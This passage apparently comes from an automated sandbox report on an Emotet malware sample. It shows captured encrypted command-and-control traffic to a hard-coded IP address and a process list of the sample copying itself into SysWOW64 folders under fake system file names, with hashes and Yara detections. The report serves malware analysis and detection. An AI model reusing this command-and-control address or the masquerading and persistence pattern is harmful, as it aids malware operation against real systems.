                                                                                                                Data Raw: 54 8b 72 50 de f5 76 89 5a 5e a8 eb 0d d2 7c 59 31 32 2b 5b 3b e4 3d 5e 1f c2 c8 0e 6d a8 bc 4a 63 3f 74 61 9e b1 58 90 65 df c4 3b a7 5b 9c a3 ca ec d5 24 b6 42 0b c0 2c 7d fd a3 63 6b 01 c8 1c e9 9e 3c 79 02 f9 32 e7 d8 f7 6a 4c d6 bf 7e 96 bf 37 14 b8 74 15 80 fe 82 a7 09 2b 9e b6 ca e2 b6 f6 01 58 4e 61 20 d1 12 1b 26 45 00 91 ed 4c 7d 1d 54 89 c1 9f 7d 04 a7 22 8f 6e c3 f9 6d 0a a5 a8 18 a2 5e 35 cd cd 85 75 86 4e e5 6d 8e c1 14 b9 2a 32 a7 fc e7 da 1d 44 9a 42 8b cb e1 40 d0 27 50 03 d1 04 de 93 a1 54 03 ab 82 c6 47 95 ea 92 6d f7 64 ee 2f ec 30 be 3d 61 f5 49 31 7a 4d fd 01 8b 39 23 c5 6c 5f b5 a4 cf 3a a5 ca d7 2b 66 fb 99 77 4d 99 b9 fd 1c 03 c1 71 c2 43 bd 27 a5 95 2d 84 78 aa 6b fa 35 14 c3 9e 85 ad 37 dd 8c 9a 9f c7 b5 05 d7 95 45 b9 b2 21 7e f4 35 14 de 70 04 03 b2 66 e2 49 f9 ac 27 06 e1 f9 24 65 5d a2 52 6f c6 be 8e 1e e5 d3 13 35 6e fd fe 8d d1 16 00 54 25 34 ae 95 b1 76 43 6a f7 ea ed 0a 4b bc 89 d9 8f 1d 86 0e bf f6 a8 95 4e 92 24 33 c7 c5 0f 33 9c 41 67 83 2e e9 54 14 43 5b c3 c8 ae 82 62 d5 60 3d a0 70 d7 d5 57 67 c2 0d 91 79 8e ae 17 b8 60 f9 14 0a 7a b2 0b f5 5a 80 5a ae e3 a2 1e 1a 9b 46 23 b5 8e ba b5 a7 58 16 d3 98 f1 86 ac 57 9d ba 6b aa 1e 87 f6 dc 04 65 ad a9 eb 5d f5 ac 2f 89 17 ba e9 bf 4d a2 e7 4d 06 f0 8b 43 ac 60 47 e3 04 eb 75 01 d6 22 4f 90 ce fa 1e 61 70 6e 49 38 c5 42 d1 57 e8 2c 31 e6 77 e5 25 f3 12 e4 b5 84 45 d4 e6 8c 36 65 04 38 dd 8a d0 16 64 ee 06 8c 62 16 bc fe ce c7 f9 4d c3 7d db 03 f4 1d 21 36 df 18 06 94 32 85 07 f2 fc 56 e4 6d 48 2c e8 19 17 2a 9f 41 59 ef f7 6b 4f 3e 6f d2 30 62 85 61 ec cf 65 e7 b0 19 e0 dc c8 dc 1f 4a f0 46 e9 86 88 3f c3 49 a2 b2 7a ec 38 d5 38 7e 5c 29 75 88 d1 23 bb 16 a8 af a5 f3 ff 65 72 f5 e7 19 5c 52 93 6c 47 48 4b fa 1a 5a 53 e5 7b 93 75 48 13 f3 89 6d 58 00 7b fb 82 20 5b 27 04 57 79 8f 27 85 86 56 8f c4 67 5f 15 3d ca d5 47 57 67 87 2d 50 d3 c7 34 24 64 26 40 68 3b ce 24 99 b0 97 81 59 fd c7 9b 30 5b 86 49 7e 53 bd 0c 29 e1 b7 85 07 f7 44 82 df 90 41 da 84 c0 9a c3 f1 2f d4 d1 e7 af 7e 25 83 11 6a 14 8f 5a a7 db 89 b8 b4 82 5e e0 13 a6 23 0f 63 26 06 c9 5c b6 ca b6 ca a7 72 52 5d 99 85 33 c8 f5 a5 bf 54 13 a4 ec 0d dc 64 97 80 47 28 23 ec b3 50 75 3d 12 1c fd c5 32 d3 c4 4b a4 25 25 d6 9a 77 6a f1 1b f1 9f 15 17 93 59 64 80 cb 9a 4b 5d 31 c3 aa 57 40 3c 6c d0 bf ad b1 fd e2 49 bc 0f 1e c9 86 f7 ec 52 a3 1d f2 ea e1 2d 43 81 09 69 47 6c 9a 22 25 eb 4b 0c 0e 87 20 af 24 cc a0 63 cf 41 c0 09 fe 07 eb 2c 51 b4 c4 b3 93 a7 db 19 b0 67 4d 5c 6f 5b 58 9c ec 31 15 20 e4 49 42 d4 6e 19 33 7d a6 66 6c e5 d7 02 e0 72 03 85 45 9b 9c ee 14 cf d0 5c 4d eb 07 3a 23 73 ad e0 27 db 24 83 6b 39 16 ea 47 7a dd 97 83 6f b4 33 25 7e 94 39 43 27 71 9d 29 41 37 06 7f 75 67 af 28 e1 7a 92 da de b0 4d e7 da d9 88 7d f2 03 a0 ab c1 1d 9e 83 41 05 8b 5b bc 8c e0 76 3d 71 6e 32 cc 17 8f 05 32 1d d8 d2 c6 ed 5e f6 56 f9 d5 21 66 a2 5a ae 7f 83 13 62 55 d3 7b 16 4c 12 65 d3 32 ae e6 b7 49 05 1a 47 d3 3a ef 3e 81 01 86 fe 90 6e 11 f6 4d f2 7f 86 c7 f0 0c 05 e3 01 6e 10 a4 25 d2 bf a8 0a f8 da a3 a8 6b 13 86 11 4a f9 ce 8d 63 86 7b e1 36 b0 85 1b 41 52 2c e0 b3 50 71 3a f9 42 43 bc 0e 0c 60 6f aa 59 c9 5d 35 33 12 24 e9 a7 5a f7 d4 6b 8a ad df eb cb 09 24 48 38 d3 62 da 65 0e f7 6a 45 3e 29 d6 72 22 20 9e f5 4b ca f4 f9 c9 8d 8e 7a a3 9c bd e2 7f c7 39 7a 22 96 3a 60 1f a5 ff e7 0c dd 72 95 ce 6d 72 24 45 ac 62 c8 8c 93 40 c4 4c 7c 75 07 93 d4 c8 7e 5b 3e 94 1f bb 03 7b 8d 8b 49 46 96 e2 19 a4 bc 97 a9 89 6a c7 b4 7a 8d a2 3f b6 ec 89 40 80 e7 03 f5 d3 e7 8b
                                                                                                                Data Ascii: TrPvZ^|Y12+[;=^mJc?taXe;[$B,}ck<y2jL~7t+XNa &EL}T}"nm^5uNm*2DB@'PTGmd/0=aI1zM9#l_:+fwMqC'-xk57E!~5pfI'$e]Ro5nT%4vCjKN$33Ag.TC[b`=pWgy`zZZF#XWke]/MMC`Gu"OapnI8BW,1w%E6e8dbM}!62VmH,*AYkO>o0baeJF?Iz88~\)u#er\RlGHKZS{uHmX{ ['Wy'Vg_=GWg-P4$d&@h;$Y0[I~S)DA/~%jZ^#c&\rR]3TdG(#Pu=2K%%wjYdK]1W@<lIR-CiGl"%K $cA,QgM\o[X1 IBn3}flrE\M:#s'$k9Gzo3%~9C'q)A7ug(zM}A[v=qn22^V!fZbU{Le2IG:>nMn%kJc{6AR,Pq:BC`oY]53$Zk$H8bejE>)r" Kz9z":`rmr$Eb@L|u~[>{IFjz?@
                                                                                                                Feb 23, 2021 16:29:55.735622883 CET11542OUTPOST /LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/ HTTP/1.1
                                                                                                                Referer: http://87.106.139.101/LrBFYD0XkeH6Uxd/HqBc9ORyzrNJU/Ah5wivG5/fOm2sJDdlpsjYC5CZe/
                                                                                                                Content-Type: multipart/form-data; boundary=---------------------------478597482596704
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                Host: 87.106.139.101:8080
                                                                                                                Content-Length: 4596
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Feb 23, 2021 16:29:56.797887087 CET11547INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 23 Feb 2021 15:29:56 GMT
                                                                                                                Content-Type: test/html; charset=UTF-8
                                                                                                                Content-Length: 132
                                                                                                                Connection: keep-alive
                                                                                                                vary: Accept-Encoding
                                                                                                                Data Raw: 86 2d 97 64 dc 2f f8 df 14 38 07 51 47 c3 82 1e 9f a3 ba c8 d0 2b 43 69 bb 3b 52 61 27 3f 2a 29 23 ca ab b4 0c 87 79 27 e5 f8 12 aa 34 a6 67 1b cb d6 18 b7 d9 cd 1f 7e a9 3e d8 f6 74 85 25 34 ef 26 d3 d4 a7 7d dd 72 9d 53 6e ab e6 41 e3 1b 5d 14 0c 65 04 51 c3 9d 16 cd 48 17 e8 f2 17 79 96 33 16 89 ac 54 9d a3 23 36 b4 bc b1 be 1e e3 7b 1d ff ee a8 9b 7f 6a a9 e0 c1 90 86 7c bc 82 62 c4 e5 da
                                                                                                                Data Ascii: -d/8QG+Ci;Ra'?*)#y'4g~>t%4&}rSnA]eQHy3T#6{j|b


                                                                                                                Code Manipulations

                                                                                                                Statistics

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Start time:16:28:33
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Users\user\Desktop\MV9tCJw8Xr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:'C:\Users\user\Desktop\MV9tCJw8Xr.exe'
                                                                                                                Imagebase:0x400000
                                                                                                                File size:262144 bytes
                                                                                                                MD5 hash:B12817C1C8BA085A7A82655FBA90E53D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.243322939.00000000021E1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.243267422.0000000002180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.243296865.00000000021C4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                Reputation:low

                                                                                                                General

                                                                                                                Start time:16:28:40
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                Imagebase:0x400000
                                                                                                                File size:262144 bytes
                                                                                                                MD5 hash:B12817C1C8BA085A7A82655FBA90E53D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.409946208.00000000020C4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.409716178.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.410029176.00000000021D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                Reputation:low

                                                                                                                General

                                                                                                                Start time:16:28:48
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:28:58
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:28:59
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                Imagebase:0x7ff6e70f0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:00
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:00
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                Imagebase:0x7ff6f5060000
                                                                                                                File size:163336 bytes
                                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:01
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:04
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:23
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:36
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:47
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                Imagebase:0x7ff641cd0000
                                                                                                                File size:51288 bytes
                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:29:55
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA=
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.413932910.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.414052123.0000000002F14000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000016.00000002.412800025.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 59%, Metadefender, Browse
                                                                                                                • Detection: 93%, ReversingLabs
                                                                                                                Reputation:low

                                                                                                                General

                                                                                                                Start time:16:29:59
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.417949677.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000017.00000002.420026339.0000000002BC4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                Reputation:low

                                                                                                                General

                                                                                                                Start time:16:30:01
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                Imagebase:0x7ff7bfb80000
                                                                                                                File size:455656 bytes
                                                                                                                MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:30:02
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff774ee0000
                                                                                                                File size:625664 bytes
                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high

                                                                                                                General

                                                                                                                Start time:16:30:02
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.429639515.0000000002CD4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.429459440.0000000002C70000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:07
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001B.00000002.433437120.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001B.00000002.438746003.0000000001350000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:09
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\glu32\usp10.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\glu32\usp10.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001C.00000002.439928850.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001C.00000002.442504698.0000000002E94000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:12
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001D.00000002.446724023.0000000003274000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001D.00000002.446019093.0000000001850000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001D.00000002.443777034.0000000000401000.00000020.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:14
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001E.00000002.447921757.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001E.00000002.449294722.0000000001310000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001E.00000002.449645390.0000000002D64000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:16
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001F.00000002.463773326.00000000028B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001F.00000002.464108385.0000000002914000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:22
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000020.00000002.468787553.00000000029E4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000020.00000002.468454177.0000000002980000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000020.00000002.465519796.0000000000401000.00000020.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:24
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\ftp\wmvdspa.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\ftp\wmvdspa.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000022.00000002.470554430.0000000000401000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000022.00000002.477958707.00000000031B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000022.00000002.478389759.0000000003214000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                General

                                                                                                                Start time:16:30:27
                                                                                                                Start date:23/02/2021
                                                                                                                Path:C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
                                                                                                                Imagebase:0xa40000
                                                                                                                File size:662528 bytes
                                                                                                                MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000024.00000002.482749716.00000000025B0000.00000040.00000001.sdmp, Author: Joe Security
